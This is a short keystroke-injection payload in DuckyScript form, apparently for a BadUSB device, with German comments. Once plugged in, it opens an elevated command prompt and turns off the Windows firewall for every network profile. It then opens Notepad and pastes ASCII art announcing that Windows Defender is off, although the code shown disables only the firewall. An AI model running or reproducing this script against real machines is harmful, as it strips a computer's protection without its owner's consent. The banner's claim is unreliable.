DELAY 1000
GUI r
DELAY 500
STRING cmd
DELAY 500
CTRL SHIFT ENTER
DELAY 750
STRING netsh advfirewall set allprofiles state off
DELAY 500
ENTER
DELAY 500
ALT F4
DELAY 500
REM --- Windows Defender via Clipboard (Layout-Proof) ---
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1500

REM Wir packen das gesamte Bild in die Zwischenablage
STRING $a = @'
ENTER
STRING  __      __.__            .___                    ________          _____                  .___             .__          __                         
ENTER
STRING /  \    /  \__| ____    __| _/______  _  ________ \______ \   _____/ ____\____    ____    __| _/___________  |__| _______/  |_  _____   __ __  ______
ENTER
STRING \   \/\/   /  |/    \  / __ |/  _ \ \/ \/ /  ___/  |    |  \_/ __ \   __\/ __ \ /    \  / __ |/ __ \_  __ \ |  |/  ___/\   __\ \__  \ |  |  \/  ___/
ENTER
STRING  \        /|  |   |  \/ /_/ (  <_> )      /\___ \   |    `   \  ___/|  | \  ___/|   |  \/ /_/ \  ___/|  | \/ |  |\___ \  |  |    / __ \|  |  /\___ \ 
ENTER
STRING   \__/\  / |__|___|  /\____ |\____/ \/\_//____  > /_______  /\___  >__|  \___  >___|  /\____ |\___  >__|    |__/____  > |__|   (____  /____//____  >
ENTER
STRING        \/          \/      \/                \/          \/      \/          \/     \/      \/    \/                \/              \/            \/ 
ENTER
STRING '@ | Set-Clipboard
ENTER
DELAY 500

REM Notepad öffnen und einfügen
GUI r
DELAY 300
STRING notepad.exe
ENTER
GUI UP
DELAY 1000
CONTROL v
ENTER

REM PowerShell schließen
ALT TAB
DELAY 300
STRING exit
ENTER